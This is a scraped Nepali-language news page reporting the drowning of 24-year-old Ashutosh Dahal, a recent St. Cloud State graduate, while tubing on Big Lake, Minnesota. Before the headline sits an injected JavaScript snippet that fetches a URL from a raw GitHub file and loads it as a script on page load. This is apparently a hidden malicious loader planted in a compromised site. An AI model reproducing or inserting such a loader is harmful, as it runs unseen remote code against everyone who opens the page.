;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); पानीमा डुब्दा अमेरिकामा एक नेपालीको मृत्यु – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • पानीमा डुब्दा अमेरिकामा एक नेपालीको मृत्यु
जुनेली बिशेष

पानीमा डुब्दा अमेरिकामा एक नेपालीको मृत्यु

साउन २१,

अमेरिका । अमेरिकाको मिनेसोटामा पानीमा डुबेर शनिबार विराटनगरका आशुतोष दाहालको मृत्यु भएको छ। उनी शनिबार स्थानीय बिग लेकमा ट्युबिङ्ग गर्न गएका थिए। लगभग साँझ पौने आठ बजे पानीमा खसेका थिए।

सुरक्षाकर्मी र उद्धारकर्मीहरुले दाहालको शव राती ९:३० मा फेला पारेका हुन्‌। कोभिड-१९ का कारण आफन्त आउन नसक्ने भएकाले दाहालको अन्तिम संस्कार यतै गर्ने र अस्तु नेपाल पठाउने जानकारी एसोसिएसन अफ नेपाली इन मिनेसोटाले दिएको छ।

२४ वर्षीय दाहालले स्थानीय सेन्ट क्लाउड स्टेट युनिभर्सिटीबाट हालै ग्य्राजुएट गरेका थिए। उनको परिवार अहिले काठमाडौं बस्दै आएको छ। file Photo

फेसबुक प्रतिक्रियाहरु